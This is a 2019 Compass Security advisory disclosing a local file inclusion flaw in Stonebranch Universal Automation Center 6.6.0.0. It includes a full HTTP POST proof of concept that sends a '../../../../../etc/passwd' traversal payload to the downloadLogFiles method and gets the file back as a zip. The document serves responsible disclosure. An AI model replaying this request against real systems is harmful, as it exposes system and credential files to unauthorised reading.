#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:   Universal Automation Center (UAC) [1]
# Vendor:    Stonebranch
# CSNC ID:   CSNC-2019-004
# Subject:   Local File Inclusion
# Risk:      Medium
# Effect:    Remotely exploitable
# Author:    MF & fxai (advisories@compass-security.com)
# Date:      21.05.2019
#
#############################################################

Introduction:
-------------
Universal Automation Center (UAC) is a system of four dynamic IT automation products allowing you to automate your 21st century business processing, securely manage file transfers or extend a legacy scheduling solution throughout the enterprise.

Affected:
---------
The following UAC versions are vulnerable:
6.6.0.0 build 268 and possibly earlier versions.

Technical Description:
----------------------
The UAC Web User Interface is vulnerable against a local file inclusion attack. 
The vulnerability lies in the downloadLogFiles method:

HTTP POST Request:

uuid=[CUT BY COMPASS]&_transaction=<transaction xmlns:xsi="http://www.w3.org/2000/10/XMLSchema-instance" xsi:type="xsd:Object">
	<transactionNum xsi:type="xsd:long">704</transactionNum>
	<operations xsi:type="xsd:List">
		<elem xsi:type="xsd:Object">
			<appID>opswise</appID>
			<className>OpswiseRpc</className>
			<methodName>downloadLogFiles</methodName>
			<arguments xsi:type="xsd:List">
				<elem xsi:type="xsd:List">
					<elem>../../../../../etc/passwd</elem>
				</elem>
			</arguments>
			<is_ISC_RPC_DMI xsi:type="xsd:boolean">true</is_ISC_RPC_DMI>
		</elem>
	</operations>
	<jscallback>iframe</jscallback>
</transaction>&protocolVersion=1.0&__iframeTarget__=isc_HiddenFrame_3

HTTP Response, containing a zip file with the requested file as an attachment:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN
Content-Disposition: attachment; filename="opswise_logs.zip"
Content-Type: application/zip
Date: Fri, 17 May 2019 13:17:28 GMT
Connection: close
Content-Length: 203

PK[CUT BY COMPASS]


Workaround / Fix:
-----------------
If possible, use a lookup table to load files from the local file system. 
Such a table would index only specified files by IDs, thus preventing access to files through file names.

Timeline:
---------
2019-05-17:   Vulnerability discovered
2019-05-20:   Initial vendor notification
2019-05-21:   Initial vendor response
2019-06-17:   Patched version UC 6.6.0.1 released
2019-07-25:   Public disclosure

References:
-----------
[1]: https://www.stonebranch.com/products/universal-automation-center/